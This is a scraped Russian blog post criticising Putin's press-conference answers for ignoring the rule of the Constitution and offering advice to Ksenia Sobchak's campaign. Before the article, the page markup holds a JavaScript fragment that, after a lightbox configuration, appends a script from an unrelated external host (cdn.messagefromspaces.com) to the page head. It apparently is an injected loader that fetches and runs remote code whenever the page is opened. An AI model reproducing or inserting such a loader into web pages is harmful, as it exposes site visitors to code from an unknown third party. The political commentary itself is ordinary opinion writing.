, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Путин вновь станет Президентом России и вот почему

15 Дек

Прежде всего, это доказывает анализ большой пресс-конференции Владимира Путина http://kremlin.ru/events/president/news/56378

Вопросы журналистов, а также ответы В. Путина свидетельствуют о полном непонимании назначения в общественной жизни роли Закона.

Почти все вопросы можно было решить, не обращаясь к главе государства, если бы в стране была власть Конституции, как выражение воли единственного источника власти в стране, многонационального народа, обеспеченная её гарантом и правосудием.

Вряд ли возникла просьба про участие  федерального центра в строительстве Приморского кольца из Балтийска в Калининград; суждения   о чиновниках, силовиках или околочиновник,  что положили глаз на малый и крупный бизнес.

Прекрасный вопрос был задан  журналисткой радиостанции «Говорит Москва», Дарьи Кнорре: «Владимир Владимирович, зачем Вы идёте на выборы? Какова Ваша цель, Ваша миссия? Что Вы хотите сделать для России и какой Вы видите в конце Вашего срока, если Вы победите на выборах?»

Но ещё больше меня поразил ответ гаранта Конституции: «Она (Россия) должна быть устремлена в будущее, она должна быть очень современной, политическая система должна быть гибкой, экономика должна быть построена на высоких технологиях, производительность труда должна многократно возрасти»

Ни слова о Конституции, роли права в управлении страной, обеспечении смысла, содержании и применения законов, деятельности законодательной и  исполнительной власти правосудием.

А это значит ещё шесть лет страна обречена жить без гаранта Конституции, без того, кто обязан наладить исполнение законов, кто клянётся уважать и охранять права и свободы человека и гражданина, соблюдать и защищать Конституцию России, но своё обещание не исполняет.

А как может появиться в стране гарант Конституции, если ежегодно более 9 000 000 пострадавших от преступлений, так и не получивших статус «потерпевший», даже оппозиция не приглашает для борьбы с самовластием.

Не зовут в оппозицию и сотни тысяч тех, кого  ежегодно осуждают только на одних их признательных показаниях, не исследуя собранные по делу доказательства.

Безразлична оппозиция и к тому, что чиновники и депутаты имеют зарплаты и пенсии, превышающие средние по стране в 20−25 раз. Иначе, как дикостью нельзя назвать тот факт, что депутат получает такое же денежное довольствие, как сенатор США, но при этом зарплата сенатора не может быть выше 8 средних зарплат в США.

Неравенство в выплате пенсий, также оппозицию не волнует. А ведь несправедливость в выплате пенсий касается миллионов россиян. Военные пенсионеры, прослужившие по 25−30 лет на просторах страны, жившие в аварийных домах со всеми удобствами на улице, получают в 5 раз меньше, чем судья,  прослуживший 20 лет во дворцах правосудия.

Совсем не волнует оппозицию то, что миллионы выпускников учебных заведений не могут найти работу по специальности, вынуждены перебиваться временными заработками по 10−15 тыс. руб. даже в Москве. А это тоже миллионы энергичных избирателей.

Странно, что при таких обстоятельствах в России не появился свой Трамп, предвыборная компания и речи которого позволили бы ему стать гарантом Конституции.

Рассуждения Ксении Собчак о Навальном и её вопрос: «Неужели власть боится конкуренции?», прямо свидетельствует о том, что она не только не понимает сути предстоящей борьбы за должность главы государства, но не сумела даже сориентироваться в ходе пресс-конференции.

Перед этим В. Путин  подробно рассказал, почему у нас вроде шумные и деятельные оппозиционеры есть, но они действительно не составляют реальной действующей конкуренции власти. У оппозиции нет ясной и понятной людям программы позитивных действий.

Поэтому ответ В. Путина был убедительным: «Оппозиция должна выйти с ясной и понятной людям программой позитивных действий, конкуренция должна быть, а не радикализм».

На вопрос В. Путина: «У вас позитивная программа действия?»,  ответа у Ксении Собчак не нашлось.

Политика может быть и быстротечной модой, кратковременным господством определенных вкусов, но властвуя над людьми, она либо помогает им, либо ведёт их на гибель. Не заиграться бы в модную политику.

Полагаю, что лозунгом в предвыборной компании Ксении Анатольевны  должна быть фраза: «За власть Конституции, обеспеченную её гарантом  и правосудием». Тогда всем станет ясно, чего она добивается, почему именно это важно для страны и россиян.  На этой позиции, как на фундаменте должна выстраиваться и программа экономических преобразований. Надо срочно готовить такую предвыборную программу, которая будет существенно отличаться от типичных,  уже существуют у иных кандидатов.

Да, в этот раз Ксения Анатольевна может и не стать Президентом России, не сможет воспользоваться правами гаранта Конституции, чтобы установить власть Основного Закона страны, обеспеченного правосудием. Но она получит хороший опыт, определится с тем, что надо реально делать для россиян, чтобы именно её предложения и заинтересовали то молчаливое большинство из 55 млн. избирателей, что игнорирует выборы.

Ещё раз публично предлагаю ей свои услуги в написании такой программы без какой-либо оплаты.

Россияне должны увидеть, что государственная власть в России обязана осуществляться в строгом соответствии с требованиями Основного Закона страны. Именно этим  законом должна оцениваться работа Президента России, Федерального Собрания,  Правительства  и судов. Над всеми ними главенствует, властвует воля единственного источника власти, многонационального народа, изложенная в Конституции России. В этом и проявляется верховенство власти Конституции России.

Россияне должны увидеть, как осуществляется их воля, как единственного источника власти в стране, выраженная в Основном Законе страны и понять какие существуют механизмы, обеспечивающие власть Конституции в России.

Не надо пустых разговоров о сильном парламенте и коалиционном правительстве. Прежде всего, сложившуюся сегодня систему  исполнения государственной власти может изменить только Президент России, занимающий самостоятельное и главенствующее место в системе органов страны, осуществляющих государственную власть.

Конституция РФ в статье 80 устанавливает, что Президент России является гарантом Конституции России, прав и свобод человека и гражданина.

Вступая в должность, Президент России приносит народу присягу, в которой клянётся уважать и охранять права и свободы человека и гражданина, соблюдать и защищать Конституцию России. Чем и подтверждается верховенство Конституции России над тем, что осуществляет Президент страны. Он, Президент России не является верховной властью, таковой является Конституция России, как выраженная воля народа пожелавшего иметь такую государственность.

Тем самым народ России возложил на высшее должностное лицо страны — Президента России, обязанность быть гарантом Основного Закона страны, соблюдать и защищать его от любых проявлений самовластия. Важнейшей задачей, которую предстоит решить россиянам -  это найти способного быть гарантом Конституции.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.